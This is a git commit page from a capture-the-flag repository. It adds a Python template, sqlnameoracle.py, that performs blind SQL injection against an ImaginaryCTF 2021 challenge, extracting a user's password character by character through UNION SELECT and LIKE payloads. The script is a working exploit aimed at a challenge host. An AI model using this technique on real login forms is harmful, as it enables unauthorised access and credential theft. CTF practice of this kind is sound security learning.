diff options
| author | Malfurious <m@lfurio.us> | 2021-08-03 19:53:26 -0400 |
|---|---|---|
| committer | Malfurious <m@lfurio.us> | 2021-08-03 19:53:26 -0400 |
| commit | 5970194d1303e16364ff1405f974c995de46203b (patch) | |
| tree | d3f748eeb0112205bb7784bd353b22376ee827ae /templates/sqlnameoracle.py | |
| parent | ef6e3a502bf8498a8f641eb3dad11d3065359bbb (diff) | |
| parent | aa9da0f6f27759f5f3201bafb0e52f41367f08ef (diff) | |
| download | lib-des-gnux-5970194d1303e16364ff1405f974c995de46203b.tar.gz lib-des-gnux-5970194d1303e16364ff1405f974c995de46203b.zip | |
Merge tag 'pull-duso-imaginary-writeups' of https://github.com/Dusoleil/lib-des-gnux
Writeups and other tools/docs from ImaginaryCTF from Dusoleil.
* tag 'pull-duso-imaginary-writeups' of https://github.com/Dusoleil/lib-des-gnux:
Adding Initial Commit of the Sploit Tool
Adding Various Docs
Adding Various Small Tools
Git Ignore __pycache__ for All Tools
Writeups from Imaginary CTF 2021
Diffstat (limited to 'templates/sqlnameoracle.py')
| -rwxr-xr-x | templates/sqlnameoracle.py | 35 |
1 files changed, 35 insertions, 0 deletions
diff --git a/templates/sqlnameoracle.py b/templates/sqlnameoracle.py new file mode 100755 index 0000000..cec6d98 --- /dev/null +++ b/templates/sqlnameoracle.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python3 + +import string +import requests + +url = "https://awkward-bypass.chal.imaginaryctf.org/user" + +base = '\' UNION SELECT username, NULL FROM users WHERE ' +#base += 'username LIKE \'' +base += 'password LIKE \'' +tail = '%\' ESCAPE \'!\' --' +soln = '' + +while True : + found = False + for c in string.printable[:95]: + ch = c + if ch in '%[]^-!': + continue + if ch == '_': + ch = '!_' + test = soln + ch + payload = base + test + tail + code = 400 + while code != 200: + r = requests.post(url,data={'username':payload,'password':'test'}) + code = r.status_code + log = soln+c + print(log+": " if "Error" in r.text else log+": ***********") + if not "Error" in r.text : + found = True + soln += c + break + if not found: + break |